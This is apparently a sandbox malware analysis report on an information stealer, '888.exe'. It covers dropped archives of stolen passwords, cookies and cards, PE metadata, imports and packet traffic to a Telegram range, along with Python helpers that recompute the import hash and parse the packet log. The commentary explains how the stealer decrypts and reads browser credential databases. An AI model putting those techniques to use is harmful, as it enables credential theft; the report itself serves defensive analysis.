                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1368932887859682
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                      MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                      SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                      SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                      SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                      Category:dropped
                                                                      Size (bytes):889682
                                                                      Entropy (8bit):7.526670681834435
                                                                      Encrypted:false
                                                                      SSDEEP:12288:wcVRUkGAeVI4BoyfLgJKWa5ImQpS803G4Cq5YK8yUenanQnAO3phYizPKj:3VzlEBBeJ55A802Nmn4Qnz3Rmj
                                                                      MD5:711018DD053772F1927370E574DF5C67
                                                                      SHA1:DE587EF11CA26F68DA61008CA38EB8C068CD2701
                                                                      SHA-256:352F6DEE127C1ACAF31D31E293A523FD2BBEF8D8F5E6259A9815110961AEE5DE
                                                                      SHA-512:490AB6ACDC09BAA0454FABB3072B8756D5D2E55D0EA3E6C25D567D6E6CCB06462840FB290A80B2DC34D4EC2A1EE5B1B3D90077F0F71BDD047E008263D43533C4
                                                                      Malicious:false
                                                                      Preview:PK........Lk.Y................Autofill/PK........Lk.Y................Cookies/PK........Lk.Y................CreditCards/PK........Lk.Y................Downloads/PK........Lk.Y................History/PK........Lk.Y................Passwords/PK........Lk.Y..;.FG..FG......screen1.png.PNG........IHDR................C..G.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):14988
                                                                      Entropy (8bit):7.828470268563519
                                                                      Encrypted:false
                                                                      SSDEEP:192:6ILU6hBR67urKjClKjCAk8tkC9NILU6hBR67urKjClKjCAk8tkC97yKMz:6MU6WwZlZA9ttNMU6WwZlZA9ttuKMz
                                                                      MD5:49EEE1B280B8CA46420AFCBD63FE54C5
                                                                      SHA1:35CFF1BF5800749EFC0CF3D7F41F43A5C966829B
                                                                      SHA-256:FAB8FE67CF10B87B2E9005E77F87CD32519C7D54B897BD4EB04BF6B3813E762B
                                                                      SHA-512:7DD0FD623178EB1ACDFFC7A8A6656E462103F6A363F052F30672E69BBE38113505F8D84067968BA04ABBF9C225D3C49E9009812E8BF9B3B2AEE188375760F971
                                                                      Malicious:false
                                                                      Preview:PK........Hk.Y..+.............BNAGMGSPLO.pdf..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........Hk.Y.y>............EEGWXUHVUG.png...q@!.C.IQ.........&g.0z......R.|...[P....G..|>..[(n.<....S6c*L......t..:.I2lZ.Y..a..|.Y..5,.T........3.z...{...z..gm;..v.(FQX.AP..../.V..L..G...R......Y,2H...k\.T..K.;...!l.....:..M!X...N.x..>.k.m..!..6..."FK./..<6@gjq`..O.W...cK.Tc.B.|F..x........
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.549321465629513
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:888.exe
                                                                      File size:4'885'504 bytes
                                                                      MD5:b6e5859c20c608bf7e23a9b4f8b3b699
                                                                      SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
                                                                      SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
                                                                      SHA512:60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c
                                                                      SSDEEP:98304:MUnvs+Q1S4tPjBjz7eO9C8LJ/INWoDBk:pPoljfT/J8
                                                                      TLSH:3C36AF82FAC342FED98B15B0202FB73FDB351D0E8214CB93EBD45D21E866712599A25D
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}C.t.C.t.C.t.J...Q.t.Ebq/d.t.Ebp/R.t.Ebw/W.t...u/U.t...u/@.t.C.u.k.t..bp/Y.t.C.t.G.t..bv/B.t.RichC.t.........PE..L.....Df...
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x746992
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6644CE9A [Wed May 15 15:02:50 2024 UTC]
                                                                      TLS Callbacks:0x6116f0
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2cf92bf8d9707fcbea09d995433c19b6
                                                                      Instruction
                                                                      call 00007F91D109D7FEh
                                                                      jmp 00007F91D109CBE9h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ecx
                                                                      lea ecx, dword ptr [esp+04h]
                                                                      sub ecx, eax
                                                                      sbb eax, eax
                                                                      not eax
                                                                      and ecx, eax
                                                                      mov eax, esp
                                                                      and eax, FFFFF000h
                                                                      cmp ecx, eax
                                                                      jc 00007F91D109CD7Ch
                                                                      mov eax, ecx
                                                                      pop ecx
                                                                      xchg eax, esp
                                                                      mov eax, dword ptr [eax]
                                                                      mov dword ptr [esp], eax
                                                                      ret
                                                                      sub eax, 00001000h
                                                                      test dword ptr [eax], eax
                                                                      jmp 00007F91D109CD5Bh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebx
                                                                      push esi
                                                                      mov eax, dword ptr [esp+18h]
                                                                      or eax, eax
                                                                      jne 00007F91D109CD8Ah
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov eax, dword ptr [esp+10h]
                                                                      xor edx, edx
                                                                      div ecx
                                                                      mov ebx, eax
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      div ecx
                                                                      mov edx, ebx
                                                                      jmp 00007F91D109CDB3h
                                                                      mov ecx, eax
                                                                      mov ebx, dword ptr [esp+14h]
                                                                      mov edx, dword ptr [esp+10h]
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      shr ecx, 1
                                                                      rcr ebx, 1
                                                                      shr edx, 1
                                                                      rcr eax, 1
                                                                      or ecx, ecx
                                                                      jne 00007F91D109CD66h
                                                                      div ebx
                                                                      mov esi, eax
                                                                      mul dword ptr [esp+18h]
                                                                      mov ecx, eax
                                                                      mov eax, dword ptr [esp+14h]
                                                                      mul esi
                                                                      add edx, ecx
                                                                      jc 00007F91D109CD80h
                                                                      cmp edx, dword ptr [esp+10h]
                                                                      jnbe 00007F91D109CD7Ah
                                                                      jc 00007F91D109CD79h
                                                                      cmp eax, dword ptr [esp+0Ch]
                                                                      jbe 00007F91D109CD73h
                                                                      dec esi
                                                                      xor edx, edx
                                                                      mov eax, esi
                                                                      pop esi
                                                                      pop ebx
                                                                      retn 0010h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebx
                                                                      mov eax, dword ptr [esp+14h]
                                                                      or eax, eax
                                                                      jne 00007F91D109CD8Ah
                                                                      mov ecx, dword ptr [esp+10h]
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      xor edx, edx
                                                                      div ecx
                                                                      mov eax, dword ptr [esp+08h]
                                                                      Programming Language:
                                                                      • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4883ac          0x1a4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0               0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x491000          0x1b9b0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x485b68          0x1c           .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x485bc0          0x18           .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x485aa8          0x40           .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x35a000          0x4c0          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0               0x0
Sections (Name, Virtual Address, Virtual Size, Raw Size, MD5, Xored PE, ZLIB Complexity, File Type, Entropy, Characteristics):

.text
  Virtual Address: 0x1000      Virtual Size: 0x358149   Raw Size: 0x358200
  MD5: 58b136b0f6e324f2ea36c2001a61946a
  Xored PE: unknown   ZLIB Complexity: unknown   File Type: unknown   Entropy: unknown
  Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

.rdata
  Virtual Address: 0x35a000    Virtual Size: 0x130076   Raw Size: 0x130200
  MD5: c9dcd221b89f5ff0a86117992a3d645e
  Xored PE: False   ZLIB Complexity: 0.4299684674270448   File Type: data   Entropy: 5.926312917040969
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.data
  Virtual Address: 0x48b000    Virtual Size: 0x529c     Raw Size: 0x4a00
  MD5: cddfd669d1b848d82c68d8beaa9711ec
  Xored PE: False   ZLIB Complexity: 0.5308277027027027   File Type: Matlab v4 mat-file (little endian), numeric, rows 4394632, columns 0   Entropy: 5.058826172235092
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

.reloc
  Virtual Address: 0x491000    Virtual Size: 0x1b9b0    Raw Size: 0x1ba00
  MD5: f2f1f26ec7745ce120ed00fd5821e132
  Xored PE: False   ZLIB Complexity: 0.6490384615384616   File Type: data   Entropy: 6.68083376427154
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Note on reading this table: the File Type column is a libmagic guess over the raw section bytes and only means something when a section really embeds a file; the "Matlab v4 mat-file" label on .data is a weak-signature false positive (the MAT v4 header is just a few small integers), not evidence of embedded MATLAB data. The per-section statistics for .text were not computed by the report (unknown). A 0x358149-byte code section at a whole-file entropy of 6.55 is large for a stealer but well below the 7+ that packed or encrypted sections score, which is consistent with statically linked runtime and library code rather than packing.
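The Import Hash given above (2cf92bf8d9707fcbea09d995433c19b6) is the pefile-style imphash that Joe Sandbox, VirusTotal and most pivoting tools agree on, so it is worth being able to recompute it from an import listing like the per-DLL one that follows. The Python below is an added example written for this page, not report code or code from the sample: it parses rows in the form the report renders them (DLL name immediately followed by its comma-separated functions, with or without a separator) and hashes them the way pefile does. The four sample rows are copied from this report; the row regex and the matches_report helper are this example's own. Recomputing over the full listing and comparing with the report's value is the check: a mismatch means the listing is incomplete, reordered relative to the on-disk import descriptors, or contains an ordinal-only import that pefile renders differently.

```python
import hashlib
import re

# Constructed sample: four rows copied from this report's import table, in the
# run-together form the page renders ("<dll>.dll<Func1>, <Func2>, ..."); a ": "
# separator after the DLL name, if present, is tolerated.
SAMPLE_ROWS = """\
DLLImport
ntdll.dllNtCancelIoFileEx, NtCreateFile, NtWriteFile, NtReadFile, RtlNtStatusToDosError, NtDeviceIoControlFile, RtlCaptureContext, RtlUnwind
bcrypt.dllBCryptGenRandom
advapi32.dll: RegCloseKey, AllocateAndInitializeSid, RegOpenKeyExW, SystemFunction036, FreeSid, CheckTokenMembership, RegQueryValueExW
api-ms-win-crt-utility-l1-1-0.dllqsort, _rotl64
"""

# Shortest prefix ending in .dll/.ocx/.sys is the library name; the rest of the
# row, after an optional separator, is the comma-separated function list.
ROW_RE = re.compile(
    r"^(?P<dll>[\w\-.]+?\.(?:dll|ocx|sys))[:\s]*(?P<funcs>.*)$", re.IGNORECASE
)


def parse_imports(text):
    """Return [(dll_name, [function, ...]), ...] in the order the report lists them."""
    imports = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower() in ("dllimport", "dll import", "dll imports"):
            continue  # skip blank lines and the table header
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised import row: {line!r}")
        funcs = [f.strip() for f in m.group("funcs").split(",") if f.strip()]
        imports.append((m.group("dll"), funcs))
    return imports


def imphash(imports):
    """pefile-compatible import hash: MD5 over 'lib.func' pairs joined by commas,
    in import order, names lower-cased, library suffix .dll/.ocx/.sys dropped.
    An import by ordinal is rendered as 'ordN' (pefile additionally resolves
    known ordinals for a few DLLs such as ws2_32; omitted here, this report has
    no ordinal imports)."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        for func in funcs:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def matches_report(imports, reported_hash):
    """True when the hash recomputed from the listing equals the report's Import Hash."""
    return imphash(imports) == reported_hash.strip().lower()


if __name__ == "__main__":
    parsed = parse_imports(SAMPLE_ROWS)
    for dll, funcs in parsed:
        print(f"{dll}: {len(funcs)} imports")
    print("imphash of the sample rows:", imphash(parsed))
```

Feed the whole per-DLL listing to parse_imports and pass the result, together with the report's Import Hash, to matches_report; the api-ms-win-crt-* entries are hashed as separate libraries just as pefile does, so they must be included.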
DLL: imports
ntdll.dll: NtCancelIoFileEx, NtCreateFile, NtWriteFile, NtReadFile, RtlNtStatusToDosError, NtDeviceIoControlFile, RtlCaptureContext, RtlUnwind
kernel32.dll: GetFileInformationByHandle, FlushFileBuffers, WakeConditionVariable, SleepConditionVariableSRW, GetModuleHandleA, GetProcAddress, GetCurrentThread, InitOnceBeginInitialize, TlsAlloc, InitOnceComplete, TlsFree, GetStdHandle, GetConsoleMode, MultiByteToWideChar, WriteConsoleW, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, WaitForSingleObjectEx, WakeAllConditionVariable, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, FindClose, SetThreadStackGuarantee, SetFileCompletionNotificationModes, CreateIoCompletionPort, TryAcquireSRWLockExclusive, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, CreateNamedPipeW, AddVectoredExceptionHandler, ReadFileEx, SleepEx, RaiseException, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, UnhandledExceptionFilter, GetLastError, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, GetExitCodeProcess, CreateFileW, WaitForSingleObject, InitializeSListHead, TlsGetValue, TlsSetValue, GetProcessHeap, CreateThread, HeapAlloc, HeapReAlloc, CloseHandle, HeapFree, IsDebuggerPresent, EncodePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, LoadLibraryA, WriteFileEx
user32.dll: EnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
ws2_32.dll: select, setsockopt, getaddrinfo, WSASocketW, freeaddrinfo, getsockopt, WSASend, accept, closesocket, ioctlsocket, WSAStartup, socket, getsockname, WSAGetLastError, getpeername, connect, WSACleanup, recv, shutdown, send, WSAIoctl, bind, listen
bcrypt.dll: BCryptGenRandom
advapi32.dll: RegCloseKey, AllocateAndInitializeSid, RegOpenKeyExW, SystemFunction036, FreeSid, CheckTokenMembership, RegQueryValueExW
crypt32.dll: CryptUnprotectData, CertEnumCertificatesInStore, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertDuplicateCertificateChain, CertGetCertificateChain, CertFreeCertificateContext, CertCloseStore, CertDuplicateCertificateContext, CertOpenStore, CertDuplicateStore, CertAddCertificateContextToStore
secur32.dll: ApplyControlToken, AcquireCredentialsHandleA, QueryContextAttributesW, FreeCredentialsHandle, AcceptSecurityContext, DeleteSecurityContext, FreeContextBuffer, InitializeSecurityContextW, EncryptMessage, DecryptMessage
oleaut32.dll: SysFreeString, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, VariantClear
rstrtmgr.dll: RmStartSession, RmGetList, RmRegisterResources
ole32.dll: CoInitializeEx, CoSetProxyBlanket, CoCreateInstance, CoInitializeSecurity
gdi32.dll: SetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, CreateCompatibleDC, DeleteDC, GetDeviceCaps, CreateDCW, SelectObject, CreateCompatibleBitmap
api-ms-win-crt-string-l1-1-0.dll: strcpy_s, strlen, strcmp, strcspn, strncmp, wcsncmp
api-ms-win-crt-math-l1-1-0.dll: _dclass, log, ceil, pow, exp2f, __setusermatherr, roundf, truncf
api-ms-win-crt-heap-l1-1-0.dll: malloc, realloc, _msize, _set_new_mode, free, calloc
api-ms-win-crt-utility-l1-1-0.dll: qsort, _rotl64
api-ms-win-crt-time-l1-1-0.dll: _localtime64_s
api-ms-win-crt-runtime-l1-1-0.dll: _initterm, _crt_atexit, _initterm_e, exit, _configure_narrow_argv, _controlfp_s, _set_app_type, abort, __p___argc, _seh_filter_exe, _endthreadex, __p___argv, _cexit, _beginthreadex, _register_onexit_function, _c_exit, _register_thread_local_exe_atexit_callback, terminate, _get_initial_narrow_environment, _initialize_onexit_table, _exit, _initialize_narrow_environment
api-ms-win-crt-stdio-l1-1-0.dll: __p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll: _configthreadlocale

Reading the import table against the signatures: CryptUnprotectData (crypt32) is the DPAPI call needed to decrypt Chromium-family saved logins and cookie databases, which is what the "harvest and steal browser information" signature covers; RmStartSession, RmRegisterResources and RmGetList (rstrtmgr) let the binary find which process holds a browser database open so the locked file can still be read; the gdi32 set (CreateDCW, CreateCompatibleBitmap, StretchBlt, GetDIBits) together with user32 EnumDisplayMonitors is a screen capture, consistent with screen1.png in the dropped archive; the secur32 calls (AcquireCredentialsHandle, InitializeSecurityContext, EncryptMessage, DecryptMessage) are Schannel, i.e. the TLS used for the port 443 traffic; CreateProcessW with a process-thread attribute list plus CreateNamedPipeW is a child process launched with piped standard handles. The kernel32 group AreFileApisANSI, HeapCompact, HeapValidate, LockFile/LockFileEx/UnlockFile/UnlockFileEx, FlushViewOfFile, GetDiskFreeSpaceA/W and OutputDebugStringA/W is the import set of SQLite's Windows VFS, so the binary bundles SQLite and can read browser history, cookie and login databases directly. The api-ms-win-crt-* entries are Universal CRT API sets, which only exist for VS2015-or-later toolchains, so the "VS2008 SP1 build 30729" programming-language guess above should not be taken at face value.
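Joe Sandbox's packet table is often extracted with its five columns run together (timestamp, source port, destination port, source IP, destination IP, no separators), which makes ports and IPs ambiguous to the eye: 49825443 is 49825 to 443, not 4982 to 5443, and 192.168.2.10108.181.61.49 hides the boundary between two addresses. The Python below is an added example written for this page, not report code: it recovers each row by trying every split and keeping the single split that is consistent (well-formed IPs and ports, exactly one endpoint being the analysis VM 192.168.2.10, and that VM's port in the Windows default ephemeral range, an assumption used only to disambiguate), then groups packets per remote endpoint and labels the Telegram API range, which this example assumes to be 149.154.160.0/20 (confirm against current WHOIS before relying on it). The five sample rows are copied from this report's packet table.

```python
import re
from collections import namedtuple
from ipaddress import ip_address, ip_network

# Constructed sample: the header plus five rows copied from this report, in the
# run-together form the page renders (timestamp, source port, destination port,
# source IP, destination IP, with no separators between the last four fields).
SAMPLE_LOG = """\
TimestampSource PortDest PortSource IPDest IP
Dec 13, 2024 12:40:16.915498018 CET4970880192.168.2.10108.181.61.49
Dec 13, 2024 12:40:17.035352945 CET8049708108.181.61.49192.168.2.10
Dec 13, 2024 12:40:53.858319998 CET4979680192.168.2.10108.181.61.49
Dec 13, 2024 12:41:05.257632971 CET49825443192.168.2.10149.154.167.220
Dec 13, 2024 12:41:05.257678986 CET44349825149.154.167.220192.168.2.10
"""

LOCAL_IP = "192.168.2.10"     # the analysis VM; every row has it as one endpoint
EPHEMERAL_MIN = 49152         # assumption: Windows default dynamic port range starts here
TELEGRAM_NET = ip_network("149.154.160.0/20")  # assumption: Telegram API allocation, confirm via WHOIS

TS_RE = re.compile(r"^[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4}")
Packet = namedtuple("Packet", "ts sport dport sip dip")


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _ip_ok(s):
    parts = s.split(".")
    return len(parts) == 4 and all(_octet_ok(p) for p in parts)


def _port_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 65535


def parse_row(line, local_ip=LOCAL_IP):
    """Split one run-together row into a Packet. The text after the timestamp is
    ports+IPs with no delimiters, so every split is tried and kept only if both
    IPs and both ports are well-formed, exactly one endpoint is the sandbox VM,
    and the VM's port is ephemeral. The row is rejected unless exactly one
    split survives, so an ambiguous row fails loudly instead of silently."""
    m = TS_RE.match(line)
    if not m:
        raise ValueError(f"no timestamp in row: {line!r}")
    ts, rest = m.group(0), line[m.end():]
    found = []
    for i in range(1, len(rest)):
        ports, ips = rest[:i], rest[i:]
        if not ports.isdigit():
            break  # the port digits end at the first '.'
        for j in range(1, len(ips)):
            sip, dip = ips[:j], ips[j:]
            if not (_ip_ok(sip) and _ip_ok(dip)) or (sip == local_ip) == (dip == local_ip):
                continue
            for k in range(1, len(ports)):
                sport, dport = ports[:k], ports[k:]
                if not (_port_ok(sport) and _port_ok(dport)):
                    continue
                local_port = int(sport) if sip == local_ip else int(dport)
                if local_port >= EPHEMERAL_MIN:
                    found.append(Packet(ts, int(sport), int(dport), sip, dip))
    if len(found) != 1:
        raise ValueError(f"{len(found)} consistent splits for row: {line!r}")
    return found[0]


def summarize(lines, local_ip=LOCAL_IP):
    """Group packets by remote (ip, port); count each direction and keep first-seen time."""
    flows = {}
    for line in lines:
        if not line.strip() or line.startswith("Timestamp"):
            continue  # blank line or table header
        p = parse_row(line, local_ip)
        outbound = p.sip == local_ip
        key = (p.dip, p.dport) if outbound else (p.sip, p.sport)
        f = flows.setdefault(key, {"first_seen": p.ts, "out": 0, "in": 0})
        f["out" if outbound else "in"] += 1
    return flows


def classify(remote):
    """Coarse label for a remote endpoint: Telegram API range, plain HTTP, or other."""
    ip, port = remote
    if ip_address(ip) in TELEGRAM_NET:
        return "telegram-api"
    return "plain-http" if port == 80 else "other"


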